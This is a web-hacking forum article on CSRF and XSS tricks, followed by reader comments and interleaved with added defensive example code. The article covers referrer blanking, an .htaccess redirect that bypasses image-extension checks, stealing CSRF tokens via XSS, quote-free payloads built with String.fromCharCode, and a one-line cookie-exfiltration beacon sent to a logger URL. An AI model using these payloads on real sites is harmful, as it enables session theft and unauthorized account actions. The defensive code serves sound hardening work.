
Advanced csrf and xss tricks


By ghostghost | 14177 Reads

I was active here when I was a little younger, and learnt a lot. Now I am back with more knowledge of web hacking, and I want to share it with you, just as I learned from the articles here when I was a newbie myself long ago.

You need to know more than the basics of XSS and CSRF to get any use out of this text.

HOW TO CLEAN THE REFERRER

Sometimes when you have a CSRF exploit ready, you notice that the request is rejected unless the referrer is the domain the exploit targets. What you have to do then is clean the referrer.

To do this, you clean the referrer with the following code:

Remember to remove the space between java and script. This code creates an iframe whose source is a javascript: URL, builds a form on that blank page and submits it. The resulting request has a blank referrer, which gets past any referrer check that only rejects foreign domains.

If they don't even accept blank referrers, I don't think there's anything you can do about it.
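The check the article describes only holds if a blank referrer is rejected. The following is an added example, not code from the article: a server-side origin check that prefers the Origin header, falls back to Referer, and refuses requests carrying neither, with exact scheme and host comparison. Header names and the allowedOrigin value are assumptions for the demo.

```javascript
// Added example (not from the article): a strict CSRF origin check that treats
// a missing or blank Referer as a rejection, which is the case the iframe
// trick cannot get around. The `headers` shape (lowercased keys) and the
// allowedOrigin value are assumptions for the demo.

// Returns true only when the request demonstrably came from allowedOrigin.
function originAllowed(headers, allowedOrigin) {
  const allowed = new URL(allowedOrigin);
  // Prefer Origin: browsers send it on cross-site POSTs, and it cannot be
  // blanked by a javascript: iframe the way Referer can.
  const candidate = headers.origin || headers.referer;
  if (!candidate) {
    // No Origin and no Referer: the blank-referrer case. A lenient check that
    // "allows unknown" is exactly what the iframe trick relies on.
    return false;
  }
  let url;
  try {
    url = new URL(candidate);
  } catch (e) {
    return false; // unparseable value, e.g. the literal "null" from a sandboxed frame
  }
  // Compare scheme and host:port exactly; a substring or prefix match would
  // accept yay.example.evil.example or evil.example/?yay.example.
  return url.protocol === allowed.protocol && url.host === allowed.host;
}
```

Current browsers send Origin on cross-site POSTs, but GET requests and older browsers may carry neither header, so this check belongs alongside tokens or SameSite cookies rather than in place of them.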

HOW TO CIRCUMVENT FILE EXTENSION CHECKS

On forums and online communities you can often use an avatar that you link from the web, and very often only extensions like .jpg, .png etc. are allowed. What you have to do then is use Apache's .htaccess.

Make a folder on your webspace and put a .htaccess file in it with the following content (Redirect takes the request path, and the explicit 301 makes it a permanent redirect):

Redirect 301 /pic.jpg http://csrf_here

The extension filter sees http://yay.com/pic.jpg and does not trigger. But when the image is displayed, the browser follows the HTTP 301 redirect and fetches the new page.

This way you can redirect to logout.php, delete.php?id=34 etc.

Note that this cannot be used for POST-based CSRF exploits: the browser only fetches the redirect target as an image, it does not render any HTML in the response.

Additionally you can do fun stuff like redirecting to mailto:evil_popup or other protocols. Redirecting to javascript: does not work though, and thank god for that.
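The weakness above is that the check looks at the URL text, not at what the browser will actually load. As an added example (not code from the article), here is the string-only check beside a hardened validator that follows redirects itself with a hop limit, refuses non-http(s) schemes such as mailto:, and requires the final response to be an image. The `fetchHead` function and the FAKE_WEB responses are constructed for the demo so it runs offline.

```javascript
// Added example (not from the article). `fetchHead` is an injected function
// (an assumption for the demo) returning {status, headers} for a URL.

// The weak check the .htaccess trick bypasses: it only looks at the URL text.
function extensionLooksLikeImage(url) {
  return /\.(jpe?g|png|gif)$/i.test(new URL(url).pathname);
}

// Hardened check: follow redirects ourselves (bounded), reject any scheme
// other than http(s), and insist that the final hop really serves an image.
function resolvesToImage(url, fetchHead, maxHops = 3) {
  let current = url;
  for (let hop = 0; hop <= maxHops; hop++) {
    let parsed;
    try { parsed = new URL(current); } catch (e) { return false; }
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
    const res = fetchHead(parsed.href);
    if (!res) return false;
    if (res.status >= 300 && res.status < 400 && res.headers.location) {
      current = new URL(res.headers.location, parsed).href; // Location may be relative
      continue;
    }
    return res.status === 200 && /^image\//i.test(res.headers['content-type'] || '');
  }
  return false; // redirect chain too long
}

// Constructed responses modelling the article's trick: pic.jpg passes the
// extension check but 301s to a logout page; mail.jpg 301s to mailto:.
const FAKE_WEB = {
  'http://yay.example/pic.jpg':      { status: 301, headers: { location: 'http://forum.example/logout.php' } },
  'http://forum.example/logout.php': { status: 200, headers: { 'content-type': 'text/html' } },
  'http://yay.example/real.png':     { status: 200, headers: { 'content-type': 'image/png' } },
  'http://yay.example/mail.jpg':     { status: 301, headers: { location: 'mailto:someone@example' } },
};
const fakeFetchHead = (u) => FAKE_WEB[u] || null;
```

This validation runs once, at submission time, and the redirect target can be changed afterwards; the robust fix is to download and rehost the avatar rather than hotlink the remote URL.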

HOW TO DO CSRF WHEN THERE ARE TOKEN CHECKS

If you make a CSRF exploit which changes the name, email or whatever, you may find that the site uses tokens to prevent this. To circumvent this you need to find an XSS flaw. With one, you can inject JS that fetches the tokens that are needed.

Take a look at this code: http://pastebin.com/m7203ede5

This code queries /editprofile. The HTML of that page contains the token that is needed to change things.

This is the most interesting part:

data = ajaxRequest.responseText; k = data.match("[0-9]{32}");

This is called a regular expression. It searches the HTML for a number that is exactly 32 digits long. There is only one number that long, and that is our token.

The result is stored in the variable k (match() returns an array, so k[0] is the token). Then you use that token to do another AJAX request, or you create a new form dynamically and submit it. The point is that with the fetched token you can do what you want: change the email or password, delete the account, change the status etc.

This token fetching is very often needed when creating an xss worm.

WHAT TO DO IF QUOTES ARE FILTERED AWAY

Very often you find that " and ' are escaped, replaced or removed. In that case code like this won't work:

document.location.href="http://csrf"

Because the " are escaped.

To make code which has no " or ' in it, you can use JavaScript's String.fromCharCode().

Use this tool to encode your JS: http://www.wocares.com/noquote.php

E.g. to make alert("yo") work, the code would be like this:

String.fromCharCode(97,108,101,114,116,40,34,121,111,34,41)

This code alone won't make the alert work: it only builds the string. You need to wrap it in eval(), like this:

eval(String.fromCharCode(97,108,101,114,116,40,34,121,111,34,41))
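Both the token-fetching section and this one come down to the same thing: once script runs in the page, CSRF tokens and quote filters are beside the point, so the fix is output encoding rather than character blacklists. The following added example (not code from the article) shows a quote-stripping filter letting a quote-free payload through while HTML entity encoding neutralises it; the filter, the payload and the `containsHandler` stand-in for "the browser would run this" are constructed for the demo.

```javascript
// Added example (not from the article): quote stripping versus output encoding.

// The kind of filter the fromCharCode trick defeats: it removes quote chars only.
function stripQuotes(input) {
  return input.replace(/["']/g, '');
}

// Context-aware output encoding for text placed in an element body or a
// double-quoted attribute: every character that can change the HTML parse
// state is replaced, quotes included.
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// A constructed quote-free payload of the kind the article describes: the
// handler body is built from character codes (decodes to alert(1)), so the
// quote filter has nothing to remove.
const QUOTE_FREE_PAYLOAD =
  '<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>';

// Crude stand-in for "would the browser execute this": is there an element
// with an on* event handler in the rendered markup?
function containsHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Simulates a profile page embedding untrusted text through a given filter.
function renderWith(filter, untrusted) {
  return '<div class="profile">' + filter(untrusted) + '</div>';
}
```

Entity encoding is the right encoding for element bodies and quoted attributes; text placed inside a script block or a URL needs the encoding for that context instead.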

HOW TO SILENTLY STEAL COOKIES

Changing document.location.href is quite noisy, and people will understand that something bad is happening. But there's a way to send off the cookies by doing this:

new Image().src='http://logger.php?cookie='+document.cookie

This won't send the user anywhere, but silently sends the cookies off to your server.
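The beacon above only works if document.cookie exposes the session cookie, which the HttpOnly attribute prevents. As an added example (not code from the article), here is an audit of Set-Cookie headers for HttpOnly, Secure and SameSite; the cookie name and header values are constructed for the demo.

```javascript
// Added example (not from the article): audit a Set-Cookie header for the
// attributes that blunt the Image-beacon trick. HttpOnly keeps the cookie out
// of document.cookie; Secure and SameSite are checked alongside it.

// Parses one Set-Cookie value into {name, attrs}; attribute names lowercased,
// valueless attributes (HttpOnly, Secure) become true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const attrs = {};
  for (const part of rest) {
    const [k, v] = part.split('=');
    attrs[k.toLowerCase()] = v === undefined ? true : v;
  }
  return { name, attrs };
}

// Returns a list of findings for a session-bearing cookie; empty means fine.
function auditSessionCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (!attrs.httponly) findings.push(name + ': missing HttpOnly (readable via document.cookie)');
  if (!attrs.secure) findings.push(name + ': missing Secure (sent over plain http)');
  const ss = String(attrs.samesite || '').toLowerCase();
  if (ss !== 'lax' && ss !== 'strict') {
    findings.push(name + ': SameSite not Lax/Strict (attached to cross-site requests)');
  }
  return findings;
}

// Constructed sample headers: a typical forum session cookie, then the
// hardened form.
const WEAK_COOKIE = 'PHPSESSID=abc123; path=/';
const HARDENED_COOKIE = 'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax';
```

SameSite=Lax also blunts the image-redirect CSRF from the extension-check section, because the cookie is not attached to cross-site subresource loads such as images.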

FINAL WORDS

I hope you learned something from this text, and that you give it a 10/10.

If the feedback is good, I am going to write more advanced stuff on this subject :) Feedback on the language/grammar is also wanted, because English isn't my main language.

Comments
clone4 15 years ago

Poorly structured, and I'm sorry but one sentence a paragraph? Techniques presented in a rather 'newbie', non-technical way, and are a random collection of exploit techniques, rather than a logically following order of advanced exploits. Also most of the stuff described in the article is hardly 'advanced' stuff, I mean with XSS, one of the first things you learn is how to avoid quotes and double quotes… Unless you improve it, add more information, more techniques and more explanations, it will be poor from me

ghost 15 years ago

Very poor formatting. I almost can't make out where a real paragraph begins or ends. And clone4 pretty much got it all in his comment.

spyware 15 years ago

Ugh. "Advanced".

ghost 15 years ago

Yeah, this isn't advanced. This is basic shit and I'm pretty sure we already have a few articles that cover pretty much everything in this one. Poor. Oh, and you don't need to use eval() with the char code. You can just use it like this: alert(String.fromCharCode(88, 83, 83))

ghost 15 years ago

We need better moderation of articles.

Poor

korg 15 years ago

MEH!

fashizzlepop 15 years ago

Personally, The Very Hungry Caterpillar just made me hungry. This actually showed me how to clean the referrer. I wouldn't mind another article about more advanced stuff.

Rate: "Average"

ghost 15 years ago

Jeez, tough crowd. It was alright?

I liked the file extension checks, that actually would have exploited a script I recently wrote. Looks like I'm going to go fix that! xD

Mtutnid 14 years ago

I can't believe that Twitter was vulnerable to XSS until this year. :D:D

DonMilano 12 years ago

"advanced" tricks? From whose point of view, dude? :o it's really terrible…